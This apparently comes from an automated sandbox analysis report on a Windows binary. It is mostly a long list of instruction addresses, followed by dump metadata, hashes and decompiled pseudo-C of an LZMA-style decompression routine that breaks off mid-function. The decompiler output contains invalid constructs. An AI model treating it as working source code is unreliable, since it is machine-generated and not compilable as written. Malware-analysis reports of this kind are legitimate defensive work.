                                                0x004071ba
                                                0x004071bc
                                                0x00000000
                                                0x004071bc
                                                0x00406c9f
                                                0x00406ca2
                                                0x00406ca8
                                                0x00406caa
                                                0x00406caa
                                                0x00406cad
                                                0x00406cb0
                                                0x00406cb3
                                                0x00406cb6
                                                0x00406cb9
                                                0x00406cbc
                                                0x00406cbd
                                                0x00406cbf
                                                0x00406cbf
                                                0x00406cbf
                                                0x00406cc2
                                                0x00406cc5
                                                0x00406cc8
                                                0x00406ccb
                                                0x00406ccb
                                                0x00406cce
                                                0x00406cd0
                                                0x00406cd0
                                                0x00406cd3
                                                0x00406cd3
                                                0x00406cd3
                                                0x004067a9
                                                0x004067a9
                                                0x004067b2
                                                0x00000000
                                                0x00000000
                                                0x004067b8
                                                0x00000000
                                                0x004067c3
                                                0x00000000
                                                0x00000000
                                                0x004067cc
                                                0x004067cf
                                                0x004067d2
                                                0x004067d6
                                                0x00000000
                                                0x00000000
                                                0x004067dc
                                                0x004067df
                                                0x004067e1
                                                0x004067e2
                                                0x004067e5
                                                0x004067e7
                                                0x004067e8
                                                0x004067ea
                                                0x004067ed
                                                0x004067f2
                                                0x004067f7
                                                0x00406800
                                                0x00406813
                                                0x00406816
                                                0x00406822
                                                0x0040684a
                                                0x0040684c
                                                0x0040685a
                                                0x0040685a
                                                0x0040685e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040684e
                                                0x0040684e
                                                0x00406851
                                                0x00406852
                                                0x00406852
                                                0x00000000
                                                0x0040684e
                                                0x00406828
                                                0x0040682d
                                                0x0040682d
                                                0x00406836
                                                0x0040683e
                                                0x00406841
                                                0x00000000
                                                0x00406847
                                                0x00406847
                                                0x00000000
                                                0x00406847
                                                0x00000000
                                                0x00406864
                                                0x00406864
                                                0x00406868
                                                0x00407114
                                                0x00000000
                                                0x00407114
                                                0x00406871
                                                0x00406881
                                                0x00406884
                                                0x00406887
                                                0x00406887
                                                0x00406887
                                                0x0040688a
                                                0x0040688e
                                                0x00000000
                                                0x00000000
                                                0x00406890
                                                0x00406896
                                                0x004068c0
                                                0x004068c6
                                                0x004068cd
                                                0x00000000
                                                0x004068cd
                                                0x0040689c
                                                0x0040689f
                                                0x004068a4
                                                0x004068a4
                                                0x004068af
                                                0x004068b7
                                                0x004068ba
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004068ff
                                                0x00406905
                                                0x00406908
                                                0x00406915
                                                0x0040691d
                                                0x00000000
                                                0x00000000
                                                0x004068d4
                                                0x004068d4
                                                0x004068d8
                                                0x00407123
                                                0x00000000
                                                0x00407123
                                                0x004068e4
                                                0x004068ef
                                                0x004068ef
                                                0x004068ef
                                                0x004068f2
                                                0x004068f5
                                                0x004068f8
                                                0x004068fd
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406925
                                                0x00406927
                                                0x0040692a
                                                0x0040699b
                                                0x0040699e
                                                0x004069a1
                                                0x004069a8
                                                0x004069b2
                                                0x00000000
                                                0x004069b2
                                                0x0040692c
                                                0x00406930
                                                0x00406933
                                                0x00406935
                                                0x00406938
                                                0x0040693b
                                                0x0040693d
                                                0x00406940
                                                0x00406942
                                                0x00406947
                                                0x0040694a
                                                0x0040694d
                                                0x00406951
                                                0x00406958
                                                0x0040695b
                                                0x00406962
                                                0x00406966
                                                0x0040696e
                                                0x0040696e
                                                0x0040696e
                                                0x00406968
                                                0x00406968
                                                0x00406968
                                                0x0040695d
                                                0x0040695d
                                                0x0040695d
                                                0x00406972
                                                0x00406975
                                                0x00406993
                                                0x00406995
                                                0x00000000
                                                0x00406977
                                                0x00406977
                                                0x0040697a
                                                0x0040697d
                                                0x00406980
                                                0x00406982
                                                0x00406982
                                                0x00406982
                                                0x00406985
                                                0x00406988
                                                0x0040698a
                                                0x0040698b
                                                0x0040698e
                                                0x00000000
                                                0x0040698e
                                                0x00000000
                                                0x00406bc4
                                                0x00406bc8
                                                0x00406be6
                                                0x00406be9
                                                0x00406bf0
                                                0x00406bf3
                                                0x00406bf6
                                                0x00406bf9
                                                0x00406bfc
                                                0x00406bff
                                                0x00406c01
                                                0x00406c08
                                                0x00406c09
                                                0x00406c0b
                                                0x00406c0e
                                                0x00406c11
                                                0x00406c14
                                                0x00406c14
                                                0x00406c19
                                                0x00000000
                                                0x00406c19
                                                0x00406bca
                                                0x00406bcd
                                                0x00406bd0
                                                0x00406bda
                                                0x00000000
                                                0x00000000
                                                0x00406c2e
                                                0x00406c32
                                                0x00406c55
                                                0x00406c58
                                                0x00406c5b
                                                0x00406c65
                                                0x00406c34
                                                0x00406c34
                                                0x00406c37
                                                0x00406c3a
                                                0x00406c3d
                                                0x00406c4a
                                                0x00406c4d
                                                0x00406c4d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406ce2
                                                0x00406ce6
                                                0x00406ced
                                                0x00406cf0
                                                0x00406cf3
                                                0x00406cfd
                                                0x00000000
                                                0x00406cfd
                                                0x00406ce8
                                                0x00000000
                                                0x00000000
                                                0x00406d09
                                                0x00406d0d
                                                0x00406d14
                                                0x00406d17
                                                0x00406d1a
                                                0x00406d0f
                                                0x00406d0f
                                                0x00406d0f
                                                0x00406d1d
                                                0x00406d20
                                                0x00406d23
                                                0x00406d23
                                                0x00406d26
                                                0x00406d29
                                                0x00000000
                                                0x00000000
                                                0x00406dc9
                                                0x00406dc9
                                                0x00406dcd
                                                0x0040716b
                                                0x00000000
                                                0x0040716b
                                                0x00406dd3
                                                0x00406dd6
                                                0x00406dd9
                                                0x00406ddd
                                                0x00406de0
                                                0x00406de6
                                                0x00406de8
                                                0x00406de8
                                                0x00406de8
                                                0x00406deb
                                                0x00406dee
                                                0x00000000
                                                0x00000000
                                                0x004069be
                                                0x004069be
                                                0x004069c2
                                                0x0040712f
                                                0x00000000
                                                0x0040712f
                                                0x004069c8
                                                0x004069cb
                                                0x004069ce
                                                0x004069d2
                                                0x004069d5
                                                0x004069db
                                                0x004069dd
                                                0x004069dd
                                                0x004069dd
                                                0x004069e0
                                                0x004069e3
                                                0x004069e3
                                                0x004069e6
                                                0x004069e9
                                                0x00000000
                                                0x00000000
                                                0x004069ef
                                                0x004069f5
                                                0x00000000
                                                0x00000000
                                                0x004069fb
                                                0x004069fb
                                                0x004069ff
                                                0x00406a02
                                                0x00406a05
                                                0x00406a08
                                                0x00406a0b
                                                0x00406a0c
                                                0x00406a0f
                                                0x00406a11
                                                0x00406a17
                                                0x00406a1a
                                                0x00406a1d
                                                0x00406a20
                                                0x00406a23
                                                0x00406a26
                                                0x00406a29
                                                0x00406a45
                                                0x00406a48
                                                0x00406a4b
                                                0x00406a4e
                                                0x00406a55
                                                0x00406a59
                                                0x00406a5b
                                                0x00406a5f
                                                0x00406a2b
                                                0x00406a2b
                                                0x00406a2f
                                                0x00406a37
                                                0x00406a3c
                                                0x00406a3e
                                                0x00406a40
                                                0x00406a40
                                                0x00406a62
                                                0x00406a69
                                                0x00406a6c
                                                0x00000000
                                                0x00406a72
                                                0x00000000
                                                0x00406a72
                                                0x00000000
                                                0x00406a77
                                                0x00406a77
                                                0x00406a7b
                                                0x0040713b
                                                0x00000000
                                                0x0040713b
                                                0x00406a81
                                                0x00406a84
                                                0x00406a87
                                                0x00406a8b
                                                0x00406a8e
                                                0x00406a94
                                                0x00406a96
                                                0x00406a96
                                                0x00406a96
                                                0x00406a99
                                                0x00406a9c
                                                0x00406a9c
                                                0x00406a9c
                                                0x00406aa2
                                                0x00000000
                                                0x00000000
                                                0x00406aa4
                                                0x00406aa7
                                                0x00406aaa
                                                0x00406aad
                                                0x00406ab0
                                                0x00406ab3
                                                0x00406ab6
                                                0x00406ab9
                                                0x00406abc
                                                0x00406abf
                                                0x00406ac2
                                                0x00406ada
                                                0x00406add
                                                0x00406ae0
                                                0x00406ae3
                                                0x00406ae3
                                                0x00406ae6
                                                0x00406aea
                                                0x00406aec
                                                0x00406ac4
                                                0x00406ac4
                                                0x00406acc
                                                0x00406ad1
                                                0x00406ad3
                                                0x00406ad5
                                                0x00406ad5
                                                0x00406aef
                                                0x00406af6
                                                0x00406af9
                                                0x00000000
                                                0x00406afb
                                                0x00000000
                                                0x00406afb
                                                0x00406af9
                                                0x00406b00
                                                0x00406b00
                                                0x00406b00
                                                0x00406b00
                                                0x00000000
                                                0x00000000
                                                0x00406b3b
                                                0x00406b3b
                                                0x00406b3f
                                                0x00407147
                                                0x00000000
                                                0x00407147
                                                0x00406b45
                                                0x00406b48
                                                0x00406b4b
                                                0x00406b4f
                                                0x00406b52
                                                0x00406b58
                                                0x00406b5a
                                                0x00406b5a
                                                0x00406b5a
                                                0x00406b5d
                                                0x00406b60
                                                0x00406b60
                                                0x00406b66
                                                0x00406b04
                                                0x00406b04
                                                0x00406b07
                                                0x00000000
                                                0x00406b07
                                                0x00406b68
                                                0x00406b68
                                                0x00406b6b
                                                0x00406b6e
                                                0x00406b71
                                                0x00406b74
                                                0x00406b77
                                                0x00406b7a
                                                0x00406b7d
                                                0x00406b80
                                                0x00406b83
                                                0x00406b86
                                                0x00406b9e
                                                0x00406ba1
                                                0x00406ba4
                                                0x00406ba7
                                                0x00406ba7
                                                0x00406baa
                                                0x00406bae
                                                0x00406bb0
                                                0x00406b88
                                                0x00406b88
                                                0x00406b90
                                                0x00406b95
                                                0x00406b97
                                                0x00406b99
                                                0x00406b99
                                                0x00406bb3
                                                0x00406bba
                                                0x00406bbd
                                                0x00000000
                                                0x00406bbf
                                                0x00000000
                                                0x00406bbf
                                                0x00000000
                                                0x00406e4c
                                                0x00406e4c
                                                0x00406e50
                                                0x00407177
                                                0x00000000
                                                0x00407177
                                                0x00406e56
                                                0x00406e59
                                                0x00406e5c
                                                0x00406e60
                                                0x00406e63
                                                0x00406e69
                                                0x00406e6b
                                                0x00406e6b
                                                0x00406e6b
                                                0x00406e6e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406f5b
                                                0x00406f5f
                                                0x00406f81
                                                0x00406f84
                                                0x00406f8e
                                                0x00000000
                                                0x00406f8e
                                                0x00406f61
                                                0x00406f64
                                                0x00406f68
                                                0x00406f6b
                                                0x00406f6b
                                                0x00406f6e
                                                0x00000000
                                                0x00000000
                                                0x00407018
                                                0x0040701c
                                                0x0040703a
                                                0x0040703a
                                                0x0040703a
                                                0x00407041
                                                0x00407048
                                                0x0040704f
                                                0x0040704f
                                                0x00000000
                                                0x0040704f
                                                0x0040701e
                                                0x00407021
                                                0x00407024
                                                0x00407027
                                                0x0040702e
                                                0x00406f72
                                                0x00406f72
                                                0x00406f75
                                                0x00000000
                                                0x00000000
                                                0x00407109
                                                0x0040710c
                                                0x00000000
                                                0x00000000
                                                0x00406d43
                                                0x00406d45
                                                0x00406d4c
                                                0x00406d4d
                                                0x00406d4f
                                                0x00406d52
                                                0x00000000
                                                0x00000000
                                                0x00406d5a
                                                0x00406d5d
                                                0x00406d60
                                                0x00406d62
                                                0x00406d64
                                                0x00406d64
                                                0x00406d65
                                                0x00406d68
                                                0x00406d6f
                                                0x00406d72
                                                0x00406d80
                                                0x00000000
                                                0x00000000
                                                0x00407056
                                                0x00407056
                                                0x00407059
                                                0x00407060
                                                0x00000000
                                                0x00000000
                                                0x00407065
                                                0x00407065
                                                0x00407069
                                                0x004071a1
                                                0x00000000
                                                0x004071a1
                                                0x0040706f
                                                0x00407072
                                                0x00407075
                                                0x00407079
                                                0x0040707c
                                                0x00407082
                                                0x00407084
                                                0x00407084
                                                0x00407084
                                                0x00407087
                                                0x0040708a
                                                0x0040708a
                                                0x0040708a
                                                0x0040708a
                                                0x0040708d
                                                0x0040708d
                                                0x00407091
                                                0x004070f1
                                                0x004070f4
                                                0x004070f9
                                                0x004070fa
                                                0x004070fc
                                                0x004070fe
                                                0x00407101
                                                0x00000000
                                                0x00407101
                                                0x00407093
                                                0x00407099
                                                0x0040709c
                                                0x0040709f
                                                0x004070a2
                                                0x004070a5
                                                0x004070a8
                                                0x004070ab
                                                0x004070ae
                                                0x004070b1
                                                0x004070b4
                                                0x004070cd
                                                0x004070d0
                                                0x004070d3
                                                0x004070d6
                                                0x004070da
                                                0x004070dc
                                                0x004070dc
                                                0x004070dd
                                                0x004070e0
                                                0x004070b6
                                                0x004070b6
                                                0x004070be
                                                0x004070c3
                                                0x004070c5
                                                0x004070c8
                                                0x004070c8
                                                0x004070e3
                                                0x004070ea
                                                0x00000000
                                                0x004070ec
                                                0x00000000
                                                0x004070ec
                                                0x00000000
                                                0x00406d88
                                                0x00406d8b
                                                0x00406dc1
                                                0x00406ef1
                                                0x00406ef1
                                                0x00406ef1
                                                0x00406ef1
                                                0x00406ef4
                                                0x00406ef4
                                                0x00406ef7
                                                0x00406ef9
                                                0x00407183
                                                0x00000000
                                                0x00407183
                                                0x00406eff
                                                0x00406f02
                                                0x00000000
                                                0x00000000
                                                0x00406f08
                                                0x00406f0c
                                                0x00406f0f
                                                0x00406f0f
                                                0x00406f0f
                                                0x00000000
                                                0x00406f0f
                                                0x00406d8d
                                                0x00406d8f
                                                0x00406d91
                                                0x00406d93
                                                0x00406d96
                                                0x00406d97
                                                0x00406d99
                                                0x00406d9b
                                                0x00406d9e
                                                0x00406da1
                                                0x00406db7
                                                0x00406dbc
                                                0x00406df4
                                                0x00406df4
                                                0x00406df8
                                                0x00406e24
                                                0x00406e26
                                                0x00406e2d
                                                0x00406e30
                                                0x00406e33
                                                0x00406e33
                                                0x00406e38
                                                0x00406e38
                                                0x00406e3a
                                                0x00406e3d
                                                0x00406e44
                                                0x00406e47
                                                0x00406e74
                                                0x00406e74
                                                0x00406e77
                                                0x00406e7a
                                                0x00406eee
                                                0x00406eee
                                                0x00406eee
                                                0x00000000
                                                0x00406eee
                                                0x00406e7c
                                                0x00406e82
                                                0x00406e85
                                                0x00406e88
                                                0x00406e8b
                                                0x00406e8e
                                                0x00406e91
                                                0x00406e94
                                                0x00406e97
                                                0x00406e9a
                                                0x00406e9d
                                                0x00406eb6
                                                0x00406eb8
                                                0x00406ebb
                                                0x00406ebc
                                                0x00406ebf
                                                0x00406ec1
                                                0x00406ec4
                                                0x00406ec6
                                                0x00406ec8
                                                0x00406ecb
                                                0x00406ecd
                                                0x00406ed0
                                                0x00406ed4
                                                0x00406ed6
                                                0x00406ed6
                                                0x00406ed7
                                                0x00406eda
                                                0x00406edd
                                                0x00406e9f
                                                0x00406e9f
                                                0x00406ea7
                                                0x00406eac
                                                0x00406eae
                                                0x00406eb1
                                                0x00406eb1
                                                0x00406ee0
                                                0x00406ee7
                                                0x00406e71
                                                0x00406e71
                                                0x00406e71
                                                0x00406e71
                                                0x00000000
                                                0x00406ee9
                                                0x00000000
                                                0x00406ee9
                                                0x00406ee7
                                                0x00406dfa
                                                0x00406dfd
                                                0x00406dff
                                                0x00406e02
                                                0x00406e05
                                                0x00406e08
                                                0x00406e0a
                                                0x00406e0d
                                                0x00406e10
                                                0x00406e10
                                                0x00406e13
                                                0x00406e13
                                                0x00406e16
                                                0x00406e1d
                                                0x00406df1
                                                0x00406df1
                                                0x00406df1
                                                0x00406df1
                                                0x00000000
                                                0x00406e1f
                                                0x00000000
                                                0x00406e1f
                                                0x00406e1d
                                                0x00406da3
                                                0x00406da6
                                                0x00406da8
                                                0x00406dab
                                                0x00000000
                                                0x00000000
                                                0x00406b0a
                                                0x00406b0a
                                                0x00406b0e
                                                0x00407153
                                                0x00000000
                                                0x00407153
                                                0x00406b14
                                                0x00406b17
                                                0x00406b1a
                                                0x00406b1d
                                                0x00406b20
                                                0x00406b23
                                                0x00406b26
                                                0x00406b28
                                                0x00406b2b
                                                0x00406b2e
                                                0x00406b31
                                                0x00406b33
                                                0x00406b33
                                                0x00406b33
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406f12
                                                0x00406f12
                                                0x00406f12
                                                0x00406f16
                                                0x00000000
                                                0x00000000
                                                0x00406f1c
                                                0x00406f1f
                                                0x00406f22
                                                0x00406f25
                                                0x00406f27
                                                0x00406f27
                                                0x00406f27
                                                0x00406f2a
                                                0x00406f2d
                                                0x00406f30
                                                0x00406f33
                                                0x00406f36
                                                0x00406f39
                                                0x00406f3a
                                                0x00406f3c
                                                0x00406f3c
                                                0x00406f3c
                                                0x00406f3f
                                                0x00406f42
                                                0x00406f45
                                                0x00406f48
                                                0x00406f4b
                                                0x00406f4f
                                                0x00406f51
                                                0x00406f54
                                                0x00000000
                                                0x00406f56
                                                0x00000000
                                                0x00406f56
                                                0x00406f54
                                                0x00407189
                                                0x00000000
                                                0x00000000
                                                0x004067b8

                                                Memory Dump Source
                                                • Source File: 00000000.00000002.341890292.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.341863679.0000000000400000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341957776.0000000000408000.00000002.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.341979389.000000000040A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342024788.0000000000413000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342089403.0000000000422000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342138840.000000000042A000.00000004.00020000.sdmp Download File
                                                • Associated: 00000000.00000002.342165521.000000000042D000.00000002.00020000.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b03ad86bf6e5db825a161e7c2c9863a2c6e055a2fa0602cea3b48f6a3cf4a0c0
                                                • Instruction ID: 7a557209975026f945a3d96698a9d3e809275b90a73cce2131b371529b247a98
                                                • Opcode Fuzzy Hash: b03ad86bf6e5db825a161e7c2c9863a2c6e055a2fa0602cea3b48f6a3cf4a0c0
                                                • Instruction Fuzzy Hash: 0F813471D04228CFDF24CFA8C884BADBBB1FB44305F25816AD456BB281C778A996DF45
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00406776, Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 98%
                                                			E00406776(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M004071C8))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
